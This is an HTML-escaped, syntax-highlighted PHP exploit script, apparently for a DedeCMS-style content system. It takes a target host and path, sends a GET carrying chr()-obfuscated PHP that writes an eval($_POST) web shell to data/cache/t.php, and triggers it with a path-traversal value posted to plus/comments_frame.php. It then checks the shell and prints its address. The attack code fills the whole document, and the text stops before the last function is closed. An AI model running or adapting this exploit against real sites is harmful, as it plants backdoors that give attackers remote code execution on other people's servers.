&lt;span style=&quot;color: #990000;&quot;&gt;error_reporting&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;7&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #990000;&quot;&gt;ini_set&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'max_execution_time'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;0&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #000088;&quot;&gt;$host&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$argv&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;1&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$path&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$argv&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#91;&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;2&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#93;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #000088;&quot;&gt;$post_a&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;'plus/digg_ajax.php?id=1024e1024&amp;amp;*/fputs(fopen(chr(46).chr(46).chr(47).chr(100).chr(97).chr(116).chr(97).chr(47).chr(99).chr(97).chr(99).chr(104).chr(101).chr(47).chr(116).chr(46).chr(112).chr(104).chr(112),chr(119).chr(43)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(120).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));/*'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$post_b&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;'needCode=aa/../../../data/mysql_error_trace'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$shell&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;'data/cache/t.php'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
get_send&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$post_a&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
post_send&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'plus/comments_frame.php'&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$post_b&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #000088;&quot;&gt;$content&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; post_send&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$shell&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'t=echo tojen;'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #b1b100;&quot;&gt;if&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;substr&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$content&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;9&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #cc66cc;&quot;&gt;3&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;==&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;'200'&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
    &lt;span style=&quot;color: #b1b100;&quot;&gt;echo&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;Shell Address is:&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$host&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$path&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$shell&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;&lt;span style=&quot;color: #b1b100;&quot;&gt;else&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
    &lt;span style=&quot;color: #b1b100;&quot;&gt;echo&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;Error.&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
&lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;function&lt;/span&gt; get_send&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$url&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
    &lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;global&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$host&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$path&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;GET &amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$path&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$url&lt;/span&gt;  HTTP/1.1&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Accept: */*&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Referer: http://&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$host&lt;/span&gt;&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$path&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Accept-Language: zh-cn&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Content-Type: application/x-www-form-urlencoded&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Host: &lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$host&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Connection: Close&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #990000;&quot;&gt;fsockopen&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$host&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;80&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #b1b100;&quot;&gt;if&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;!&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
        &lt;span style=&quot;color: #b1b100;&quot;&gt;echo&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;Connect to host Error&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
    &lt;span style=&quot;color: #990000;&quot;&gt;fputs&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
    &lt;span style=&quot;color: #000088;&quot;&gt;$back&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;''&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
    &lt;span style=&quot;color: #b1b100;&quot;&gt;while&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;!&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;feof&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;
        &lt;span style=&quot;color: #000088;&quot;&gt;$back&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #990000;&quot;&gt;fread&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;1024&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #990000;&quot;&gt;fclose&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #b1b100;&quot;&gt;return&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$back&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
&lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;function&lt;/span&gt; post_send&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$url&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$cmd&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
&amp;nbsp;
    &lt;span style=&quot;color: #000000; font-weight: bold;&quot;&gt;global&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$host&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$path&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;POST &amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$path&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$url&lt;/span&gt;  HTTP/1.1&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Accept: */*&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Referer: http://&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$host&lt;/span&gt;&lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$path&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Accept-Language: zh-cn&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Content-Type: application/x-www-form-urlencoded&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Host: &lt;span style=&quot;color: #006699; font-weight: bold;&quot;&gt;$host&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Content-Length: &amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;strlen&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$cmd&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;.&lt;/span&gt;&lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;Connection: Close&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\r&lt;/span&gt;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$cmd&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #990000;&quot;&gt;fsockopen&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$host&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;80&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #b1b100;&quot;&gt;if&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;!&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#123;&lt;/span&gt;
        &lt;span style=&quot;color: #b1b100;&quot;&gt;echo&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;&amp;quot;&lt;span style=&quot;color: #000099; font-weight: bold;&quot;&gt;\n&lt;/span&gt;Connect to host Error&amp;quot;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#125;&lt;/span&gt;
    &lt;span style=&quot;color: #990000;&quot;&gt;fputs&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #000088;&quot;&gt;$message&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
    &lt;span style=&quot;color: #000088;&quot;&gt;$back&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;=&lt;/span&gt; &lt;span style=&quot;color: #0000ff;&quot;&gt;''&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
&amp;nbsp;
    &lt;span style=&quot;color: #b1b100;&quot;&gt;while&lt;/span&gt; &lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;!&lt;/span&gt;&lt;span style=&quot;color: #990000;&quot;&gt;feof&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;
        &lt;span style=&quot;color: #000088;&quot;&gt;$back&lt;/span&gt; &lt;span style=&quot;color: #339933;&quot;&gt;.=&lt;/span&gt; &lt;span style=&quot;color: #990000;&quot;&gt;fread&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;,&lt;/span&gt; &lt;span style=&quot;color: #cc66cc;&quot;&gt;1024&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
    &lt;span style=&quot;color: #990000;&quot;&gt;fclose&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#40;&lt;/span&gt;&lt;span style=&quot;color: #000088;&quot;&gt;$fp&lt;/span&gt;&lt;span style=&quot;color: #009900;&quot;&gt;&amp;#41;&lt;/span&gt;&lt;span style=&quot;color: #339933;&quot;&gt;;&lt;/span&gt;
